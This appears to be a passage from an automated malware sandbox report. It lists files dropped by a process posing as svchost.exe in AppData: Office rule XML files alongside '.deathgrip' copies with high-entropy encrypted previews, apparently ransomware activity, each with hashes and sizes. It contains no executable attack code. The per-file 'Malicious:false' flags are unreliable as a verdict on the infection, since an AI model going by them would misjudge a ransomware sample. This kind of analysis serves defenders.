                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701500v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701500v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701501v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701501v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.832482504120233
                                                          Encrypted:false
                                                          SSDEEP:48:TYqB+xvmOZqJS+Vwu6y+G7Cf/K1jBjXDLkFgc:DIFgc+Vwu6zG+K1jBwqc
                                                          MD5:69F370D04D77D356E2776248934EDFED
                                                          SHA1:CFB6B00BDF93D2AED3F060DDF4754A78A30AB619
                                                          SHA-256:AB42F80CF0B65CBCD2299BE126DAFA3A18349E07BFDE4A120F3F87D1A6A767CC
                                                          SHA-512:490DC76D642E1A14512CA10EFF9AD04A818C3B00190CCF433B55F3724F46701FF72F9FE44301FC37A0D69E5DC77E7AF59C1CA4369B6A86C41FCB0AA6D6291828
                                                          Malicious:false
                                                          Preview:........:4;...R.-H.,.2...n>..i.f..`...|.SYS.!..m+q...B..!..r..>8,;:...T$F2;Q..o...,...D`.9 ..g...w)Q....g#.M..^.o.ht...v.....3.jM...8.v....*s...w...1....o.%...QN%......o.!........o..J.P..2`.."..4.N...G.<!....'E..xr...V.u+..b...G..s7...I..z>....:.{9.km..I.g.{.n|..G&'.....%.0.q...F.k.......j?B..-..1..).........;:6({....W.#B..X...V...D.....<MQ.*VG...=U..:>....@3....1..vf.(!.V>h.v`.}..Pz..%4[.N.d'........q....`>.1.S..X....v.... .gN..._jk.4g......A.."f.!........+@g'............X.J<.,.j.z.....w.@.z..,V]%?..`..e`>.`e.A].`...~m.2:.._....$_.tb.V.:.....].]...Fz.........q...i......c.W/.&!M{g.....D..b..%..7_.Otm..3...^.U..2._E.,vD...\..%..Q...*...F.6..^q?..5...h~.M...K.R.;.=-...*.).'.-.N..G.}.\.v..h...G.=.;?.x.P..?.X....{.r).<.{.k...U...^.u..Us.....<yuL8L4..?.\.7b.S.."...Y.,....F."?.V.b...+>.OM....lV......zQ.....]..J.e{..c....(u..2..p8..........q.....%.^Y..O<#.Z3.`.6l..`t_...)}hZ...(a........}..;..?O.....w....\8..5X.W...P.y...&U......Q.....

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701550v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701550v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.825761368945233
                                                          Encrypted:false
                                                          SSDEEP:24:11G+osfb3acRy6clMIioqnOe4E+Z+f1CCQ77/4m95jHZjZg1PelEtVgzv:zZ+cRGqoRe4E+KlQI45jrorVgzv
                                                          MD5:451E48DC932B8699610071FA815D7C31
                                                          SHA1:A59EC7EFE4365F5C1DB2C760473F910DD3C905BC
                                                          SHA-256:A4931DE382F7441CF42D9104D8955135348FDD8700C0B152B210A53F499DCEE8
                                                          SHA-512:C8C8F45EC24AC371183D8118515C84948063A016DDDB51483C707899D1A356205473F234B354116ED3BF8761FDC6693911A12E01FD447A1D3BAF1AC0FCD25A6F
                                                          Malicious:false
                                                          Preview:.............>Ws.B..?.{..}......@.|...9.....e...v.....(.UX...|. .)._...]..k.w.:p...aw..^..\..-F....3m..'F..is).ok[S.~Bm..9'..E...EDK:.........n......d.f..R.([3....q.=.;.....b....Nhb..Mo<.3.`>Ws3.>H.k.O..S..-V...m..0.."..../....0....e.o...YFJ3..)NJ:...68v.m....4.Ec!G..n...>..{.p..?J.,.?(+.."..<....S..(.BU.d!....v.ec...=.~.......T.V.5r....T..F./.0....O..H..A......Y.L.-.i....;<A..O..;.......n..A.G...~......bF...N.t*O.o..N..+.0ds.z..'..%....!P.u.B.)M..v.R.f.E...*YhFxLBB.....&U..D@..!;..R...:d.3#.z?.l*.M..4......-'@...<.p.w?....}.-...|.A<.+. *..O....Z2..#..._.`&5.+_..@ .r.......Au...3....*s.N. .OK(.e. V.Z..U'...f...c."/P..2....&5.xg..P.i...e)..e...]...r........+J..<*.U.RZ?.^.L.Tf...j.?ZMj.wt......A.[.....sI)l....s.R..|..........]..J...}..G..:..`.....7.-..T..fr...........E0E.-T.Wq.b.T....3b.R.f."...>....1..U.@MI......(l..N......BH....$...C.....^......$.Z0 e.t4Kuj...u....H&i!.dY.7.c.*m..Dm....a...p.....].zO..6uT...s......p.p..!x<..D;.pH..!.*...t

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701551v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701551v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.822192196509547
                                                          Encrypted:false
                                                          SSDEEP:48:wZDXAaetmTNyrIf3SNpChrBGGQ7CigOU/9edpkrWiwJ:uzA9tmIrXNpOlGl7TgOc9erkbQ
                                                          MD5:B7BDAC4C22218ABFD043485592628211
                                                          SHA1:92183B5EF361468CF6765723A448797FFA64F3D8
                                                          SHA-256:633D2218775A4E852F7D70FE30F70B321212F55D7D0BB60F9DCFAC241F85B61F
                                                          SHA-512:06ABAFE82894F1860AEB4A29D115FE6C54A426E0AC5B5299C9931887EB8CE75DA33A26DE43D8DA2F9AF0171AD7558711A5468A84AEB3AA4F22F15ABE29091F14
                                                          Malicious:false
                                                          Preview:........._.......:o& .:..../!...W..q.5.!..;.Wj.=...!..$.,........;..z@....<.%".....Y..C...eR/..;.<.H.X?/.y......`......j+..._..Z..S.y.....'.r`.].H...>.).$t.[P.:gu.US.....nM...!F.ju......A..q.e.K..3.........JtK.V...b....x..(.kZ.2...t."KhG..h..:..`v$P..;.u.[.j.....iR.:.d~..1...#.PX.......v.cQ...'.|j..a9'Z"n...>.?=>.......9.#,.F.....[d(...q..YC...Q..3c....`.....x.B...z.....U..Q.f.&...V........l....y...d/+..w.=GP.H7.....xD..#.R....C..N-.Co.....<.H..fN...$f...:xy^.....<....J.....E.Z....C..LI....._.aH...>7m.p5...&.:W.A(c.P:...m......N..S/j.K.E...I....m.>^i...FV]0F^C.D.&......x..K1.v.?.5L.......k..j..ZcIR.R.A.............";.n./..v..+t{.0U./..4g.G<.^.Y.<.....&Hf..8.<....<...-,.......qP...a.*|C..w....c}....]a../.(P)....\v.........Fk...>&...|.1.y.q.\^...,;.,....R..I....3...\}n.|Lx..E..........&=.....n.5]...|Q...I.#.JRV."...]'.).,w#.`.2...J.R.......f>....5@.....I............%....~=............W0.Y.h..R..@...M.iy.Q..%.Fe Zc...Z.*...2....].'X~5....#....

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701650v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701650v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.80271647465796
                                                          Encrypted:false
                                                          SSDEEP:24:yMhXFdkneXJfrDy4Nvxb21js+jocbPNW8TkQYuuv2s7OkH89Ald1mTzYr:yMHdkne1rDP9itZM8tacald8Ir
                                                          MD5:79A8D8DA1A0AB9C86A9CAE97683F0D9A
                                                          SHA1:9C24B1C8830612C07429962211FBA13C832DC181
                                                          SHA-256:A962AC7D011B730972B311FF38127DE35C1CD7DF9AF7BA8ED934AFB4F5FBCA87
                                                          SHA-512:20117013378141D37AADA30A82D794707C34CD19083B2FC58CA0A5FD45B50107482653F94C2FAD078E1CBE1FE68BC5320F2DE01C4F72AF62271BA698C90A3998
                                                          Malicious:false
                                                          Preview:.........3Ke.....H.(.|.n.s.*..[..M.9.O+&.(.F..5.,.>...P.......4alZ..>+N/.}.................oi.rN.o.Q...I..jx..)....R.........D.s.PR".@0..%L+..8...o.."..j.<n][eq....~~..%T.u...\S$K..9...,...5.1v....v...iu,y`....in..8....dDQM.x..$.^.*._Z.pW..q.;.`nn.t..g6M..8..Y..`y(........Kx..Gk.K..j........p.)a....^E.'.."DE.MU..u1..6.1m....6.5U(..l\zw{#...?A...k._.x.y...@...........s..7..O.RU.......\W.v..>..I......P.....'|.!.JN....i..c......%w..K.Ub3".P..q..R.t.s.~$\M.VW.U.K..\+..,?..K...e...l.M.g....<]F.....$eG....i)...;9..{...s^...G.YD.m...19..4.\;..e=X".O.;.!..x.cv.A..7..S......7W.$<..M...J.s.......%....$0q.Zk...n..}.m ..7.<.YL...<.m.S...W.."c..>....M....&I?.J..2.i.[Xa..I....`A...#.z;{....D..8.6..`~I.i.F..o.qF.o.Ix].z...J.F...y5........E.=..ks.K{.....R....5Uk....2;.3...B...8\.tX%+...C@.s......h......E.s%T.t..Qpc.>....O./....S.....P..h.....3...S.q.^....v..l|!........;.k.G...}.\U....B.....vmm...3."...4.......xi.F.=...@..x.4]..n...i5..Z..Ec..c.Q....../.

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701651v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701651v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701700v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701700v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701701v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701701v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701750v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701750v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.8155020523339465
                                                          Encrypted:false
                                                          SSDEEP:48:FAGf4FqZZKAPME6HgdBkeLCPgzH6bIUZuMMfEimMcFlrTFf+:qGEAKy6k1CPbIUZuDml+
                                                          MD5:0F566B996738CEFDCC48F2A5F396AD06
                                                          SHA1:60B46B81AF48D06000388EB6B43C13EE27069914
                                                          SHA-256:3E994E344E89B6CBCAD06EC10B4388C6CB9CB1D7CD22FE02261756F04F22C6FF
                                                          SHA-512:1F449DF45B735DBB388732817A82E229BA0C6AD1083C0D7476D3AAAD66971317EFF5523107800361F5E16023F4322E09A00E351FA201553755940BFA3FB6BCBF
                                                          Malicious:false
                                                          Preview:..........h..5.....raYl....,..9R..V..*<cNP......8....T...A.]......I.6.}R>R.....].,..`.X.b..>d..pI*5 n5..a..&...A.M.V..?(VX..A....x.@.X%..,..DL...@(...&K..6miz.>.......zP.V.,(g....G...\..m..t...*..&O.h.9a..1{.or....l.9....%..I.V!}7....c....u..++.e..&..6.j.B`..MS.........hw..D.G.L....u....i$..3+..b2n+_*.....p=. A.Z.D..1yO.H'M..k...I.*.-.Q....4.P.j.....W..r..n...5.....6...<...O.&oS........Y...r...S.....X.z.!.v..?._..)?&&V.ur{.....oUd..=..rg.4t]OmF.9....~.R.....)....#&}.P.9?.+DB.....g.Q.nI..Vt.`v....}..E.I..I.Hx.8...4_6'.0}j......Z....e..g..4.......J.Z.._q...._a.I&G-Q2..%0....8....N.e"6...t.....Z'.Ee....|..<....B.K..NX.*ea.uG...P..D.w..r|.o.{P...C.......r..AW.4.8i0.....\`V$.E..g.c.&L?M@..>................x!x.pW..{..J.F.tB..:rt..FW../w....XT.s[.g.n#G..]<...E.E..B..1&-.ar..R?.<..)....#..^.\$.KTe...0:k.t%`..+.p..R.....'..>s.g..0.(ms...H....,....H\..y..JU..5..&)....T...S......]3..|.@.a.vf../e...8....A~.. 9..2.`..n...0.e.>.r..8G.|'.1_.D...EFc.uZ...\.Q.

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701751v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701751v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701800v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.811400395245901
                                                          Encrypted:false
                                                          SSDEEP:24:QmV4cLtnswe4q08FkueqQPwpnT11XZ1AUPLpadeGH3l4yMAI18JVXMKYct2rApnf:Qmxnp38fRnTEYYn3l43sact2655
                                                          MD5:41E0CB722F2B7A2E4BD088AD34912BD0
                                                          SHA1:C8E7CB7CDA13E04972DED38E49ADB4C207C2A821
                                                          SHA-256:1A3952ACA9BA3F711F0CC607D6F7735587A895E216EEFF551D8E22DC86D979D4
                                                          SHA-512:8403357FEA1E333DD780497D0FE901D4D29978EC998BAD3F6BA2C1F0201AA47B725D728E71A919B1922338C436BDC72750D48EB55CF622C0591C7277A579B5D0
                                                          Malicious:false
                                                          Preview:...........#fyA...x&.X;.....F,..+............X.mv...T.E.....U=$.Q....b:.....T..e....r.n.(...N..k.aU{.JTT.}P.....=...........8p..!x..{......J...(8..+ .*.i.w.^*.o..?^.j^&]b..w.Rq.j..N.o.N..D.......[n.mnR.B....k+...M.F..A...|.......Y....I!..3A.t...0.2.v.i..&)U..Y.. .....v.b..z..L...0nN...a...#.e...N..f?...D..o.U3...!.mg.X.I...`Tg.8H..H.w.....7....m...|N..lE........>.L..)..o;..........YN.....+..{....5...^.c."x..<..F.VIr.Q....E....g..e.{.r.....\......OF...v7..p<.......vJu..I-....<.6...6.+3.W.....u)....r...:.+.H:x.......M..v.&...W7.B!n ...o..?<.E.;.9..!.S.0...".......b..x........>vXi.(._.%!*..M....>.).;..Ew..W..Y....%K.&...w..gY........2.%D.YI....P.0s...nq.+7.0[.@f....PJ..Pi.K.$oT|....F,.j..6.w~....9.(h9.L...<L...Kp.+#.}6.s.;.m..JR-......n..|.._aVW.M..9..9:.wr....7.H.:rD...d.n.z.&.<.y.2,fAK..^. ....=.fA.>...{.......A.p..V..U.#........9....L..<3...i........@m..q..69..1z.]..A.....]z.......2...Y..*..D....FD...oa `.....r.....]k....;r.BZ...7./>..o.w.o...

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701801v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701850v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701850v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701851v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
